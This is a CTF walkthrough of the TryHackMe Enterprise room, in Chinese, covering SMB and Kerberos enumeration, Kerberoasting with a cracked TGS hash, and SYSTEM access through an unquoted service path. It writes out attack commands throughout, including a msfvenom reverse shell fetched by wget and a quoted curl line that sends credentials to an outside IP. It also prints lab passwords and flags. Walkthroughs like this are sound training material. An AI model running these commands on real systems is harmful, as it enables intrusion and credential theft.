TryHackMe-Enterprise
信息收集
nmap扫描端口发现
nmap -sV -sC -Pn 10.10.49.191
首先访问80端口,可以看到这页面没什么有用的信息
扫一下目录发现存在robots.txt访问如下:
然后对于445端口,使用工具smbmap枚举SMB共享
smbmap -H 10.10.49.191 -u anonymous
IPC$共享有读的权限,可利用impacket中的lookupsid脚本枚举有效的域用户
python lookupsid.py anonymous@10.10.49.191 | tee usernames
cat usernames | grep SidTypeUser |gawk -F '\' '{ print $2 }' |gawk -F ' ' '{ print $1 }' |tee usernames
然而没发现有用户可以在不需要提供密码的情况下请求票证
python GetNPUsers.py -no-pass -usersfile /root/users.txt -dc-ip 10.10.49.191 lab.enterprise.thm/
再对Docs进行分析,发现存在RSA文件并且是加密过的
smbclient //10.10.49.191/Docs
smb: \> dir
. D 0 Mon Mar 15 10:47:35 2021
.. D 0 Mon Mar 15 10:47:35 2021
RSA-Secured-Credentials.xlsx A 15360 Mon Mar 15 10:46:54 2021
RSA-Secured-Document-PII.docx A 18432 Mon Mar 15 10:45:24 2021
于是尝试使用office2john进行爆破,不过爆不出结果
/usr/share/john/office2john.py RSA-Secured-Credentials.xlsx RSA-Secured-Document-PII.docx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash再对Users进行分析发现只能访问Default和LAB-ADMIN目录
smbclient //10.10.49.191/Users
并在LAB-ADMIN/AppData/Roaming/Microsoft/Windows/Powershell/PSReadline路径下发现Consolehost_hisory.txt都是历史命令
cd C:\
mkdir monkey
cd monkey
cd ..
cd ..
cd ..
cd D:
cd D:
cd D:
D:\
mkdir temp
cd temp
echo "replication:101RepAdmin123!!">private.txt
Invoke-WebRequest -Uri http://1.215.10.99/payment-details.txt
more payment-details.txt
curl -X POST -H 'Cotent-Type: ascii/text' -d .\private.txt' http://1.215.10.99/dropper.php?file=itsdone.txt
del private.txt
del payment-details.txt
cd ..
del temp
cd C:\
C:\
exit
然后再来看7990端口是跳到atlassian官网登录页面
因为开了kerberos端口,所以我们使用kerbrute在域中找到一些有效的用户名
./kerbrute_linux_amd64 userenum --dc 10.10.49.191 -d lab.enterprise.thm userlist.txt -t 100
然后使用burp的Intruder模块来查看这些用户是否有效,但是它没有发出任何POST请求,也没有将数据发送到任何url,始终都是加载的同一页面,不过根据页面上的如下提示,通过谷歌搜索发现有用线索
Reminder to all Enterprise-THM Employees: We are moving to Github!
翻阅github找到了开发者Nik-enterprise-dev
updated things后得到账号密码:nik/ToastyBoi!
又忘了续时间😶🌫️只好再重开一下
接着通过上面获取的凭据是否对SMB或WinRM有效这个用户nik只拥有与匿名用户相同的访问级别
crackmapexec smb 10.10.28.0 --shares -u nik -p 'ToastyBoi!'
SMB 10.10.28.0 445 LAB-DC [*] Windows 10.0 Build 17763 x64 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM) (signing:True) (SMBv1:False)
SMB 10.10.28.0 445 LAB-DC [+] LAB.ENTERPRISE.THM\nik:ToastyBoi!
SMB 10.10.28.0 445 LAB-DC [+] Enumerated shares
SMB 10.10.28.0 445 LAB-DC Share Permissions Remark
SMB 10.10.28.0 445 LAB-DC ----- ----------- ------
SMB 10.10.28.0 445 LAB-DC ADMIN$ Remote Admin
SMB 10.10.28.0 445 LAB-DC C$ Default share
SMB 10.10.28.0 445 LAB-DC Docs READ
SMB 10.10.28.0 445 LAB-DC IPC$ READ Remote IPC
SMB 10.10.28.0 445 LAB-DC NETLOGON READ Logon server share
SMB 10.10.28.0 445 LAB-DC SYSVOL READ Logon server share
SMB 10.10.28.0 445 LAB-DC Users READ Users Share. Do Not Touch!
也无权访问winrm
crackmapexec winrm 10.10.28.0 -u nik -p 'ToastyBoi!'
SMB 10.10.28.0 5985 LAB-DC [*] Windows 10.0 Build 17763 (name:LAB-DC) (domain:LAB.ENTERPRISE.THM)
HTTP 10.10.28.0 5985 LAB-DC [*] http://10.10.28.0:5985/wsman
WINRM 10.10.28.0 5985 LAB-DC [-] LAB.ENTERPRISE.THM\nik:ToastyBoi!
接着利用impacket中的bloodhound脚本查看是否有用户设置了SPN,如果是,那么我们可以请求TGS密钥,因为我们已经是具有我们拥有的凭据的域的一部分。TGS密钥使用服务的密码哈希进行加密。所以,如果我们能破解它,我们就能得到用户的密码
python GetUserSPNs.py -request -dc-ip 10.10.28.0 lab.enterprise.thm/nik:ToastyBoi!
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- --------- ----------------------------------------------------------- -------------------------- -------------------------- ----------
HTTP/LAB-DC bitbucket CN=sensitive-account,CN=Builtin,DC=LAB,DC=ENTERPRISE,DC=THM 2021-03-12 09:20:01.333272 2021-04-26 23:16:41.570158
[-] CCache file is not found. Skipping...
$krb5tgs$23$*bitbucket$LAB.ENTERPRISE.THM$lab.enterprise.thm/bitbucket*$b671e3da2f38f35d0fdc2b56d495d676$aa6512092645f73ef30c7b4b7cd08f6c66d7fa650ecc795b37c5c994b665bd78b6c0495b58c6f4b139aca8f0fe8950c56af2a295d9e3c659c8a803ceb5725ad94945e5e92233aea81343924e09f58ccc79e1ae9c7c3ebc2afa5e93f6414bd552c2e775f1e81992f6434363d65dc0551cba9c5b29a7c43019e780fedcba1f7d483a6ed42df3fb1380933c6cbca5d83e1092d646ea7e6808757e1ed665ff6fddd3b0ef4e5d52040754818aadcf47cca38c6f9fe038c29856c02b93e9834fd1c3c94fcc5d09a21fe70776db3fece07c66b7f8b331795487d378815ebe03dfdf1416cf25d33014158d2240f384eff8c716411720630f2340c605b4a7759b9f07a83dc59d10c86f5e77b154a77cabf1583c00f70691b0e08e8eb2708d4d9b510d5f2aa4bcfb67d8f36dbe834c00b86684d8cdcaf4d8fc1f72a3a2b3cb3ac4091583e020bf923a2781d2182103f81c630926b1e799610b27194fce05c4eaecebbd5938594a23440d4b0445ba4e7b8e2c3a589245c0765d10afa264e18584a13441e0b28c73878d76867f332e66062ac18502f66154ea78602c333fa46cd93ec338c69423c9dc4270a294edec8a4c9fc522ccce682d6cf31acc74e0ce46eab49bc0f14b4fb79943b5e40a7651a581d53921c8296aef5645544689ccad6d91df98a572ce09a57c3bdab5e848d56f58cb123ba94722cd9335839fe4fc7a360d1db37216a9d7dc21e1b9d8f765af632fbd2c3cf640e285cfd30f7b52c1aecdc3378c854eadb98fe1fbd4687169b79c21f9ec123eac4951f3a32e30df332a9ed8a35b6417bc760556efc363ce0f106d9e0d7843d54fe9ba7e6175dd7395f146a698222cf47461eacc507439a3d3c8d6fe3b34d7ad57b1a50f479b067262dbd9ad2c99998fd72d76dfbdaff97e27daeec08c0352cd041b725a808b0c43df47b80cc1131e358dd4188e94ec3cdf7d97fd809cc4c5b8ba28e89cb2b7538918a18276bfba8f1345a7105c5a1ba32d57cf082a4358b0fe576969ce2cdd8f80c6e6cd06a2ffaa7b319630cc70b2981de23faed6e4e801f8ea4cb06bdccbe6d183397c8b8ddcd758279757f60fc112aa87e66b6e1b7d3e284f7a542d0818b66b5a6175a5646a8cd1cb34309cf1a244258cfd78298ffaa2730ef49ef7e0859644755bf21dc8cb915375d0404f6c4792b0dd07a25d034739b7e432d8cb049d58a55c775f07d526457c98e7c7fd05ba64b87a2820a854e34b2b2aba716bfc1e883b1e72af8ce266fc69d70eea60f274aa9015a86e4f1e4b8c6e243c7dfff8afdfc89d491dad1a9cfbefdb9804c0100d477b60f20e275f2d7907e900f4f7408f378cd184aee4364ac7ab337096f6
再使用hashcat爆破一下得到密码:bitbucket/littleredbucket
hashcat -m 13100 hash.txt /usr/share/wordlists/rockyou.txt
登录得到flag1:THM{ed882d02b34246536ef7da79062bef36}
rdesktop 10.10.28.0 -u bitbucket -d lab.enterprise.thm -p littleredbucket
提权
这里可以发现C:\Program Files (x86)\Zero Tier路径有写的权限
Get-Acl -Path "C:\Program Files (x86)\Zero Tier" | Format-List
接着我们msf生成木马并开启web服务
msfvenom -p windows/x64/shell/reverse_tcp -f exe LHOST=10.18.98.53 LPORT=4444 -o Zero.exe
python -m http.server 80
将其下载至C:\Program Files (x86)\Zero Tier\路径下(它能够控制zerotieroneservice服务以及将文件写入,该文件路径存在unquoted service path漏洞
wget http://10.18.98.53/Zero.exe -o Zero.exe
sc start "zerotieroneservice"
Stop-Service -name "zerotieroneservice"
Start-Service -name "zerotieroneservice"
此时msf反弹shell就是system,从而得到flag2:THM{1a1fa94875421296331f145971ca4881}
use exploit/multi/handler
set lhost 10.18.98.53
set payload windows/x64/shell/reverse_tcp
run
完结撒花🎉
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2022-12-31,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
目录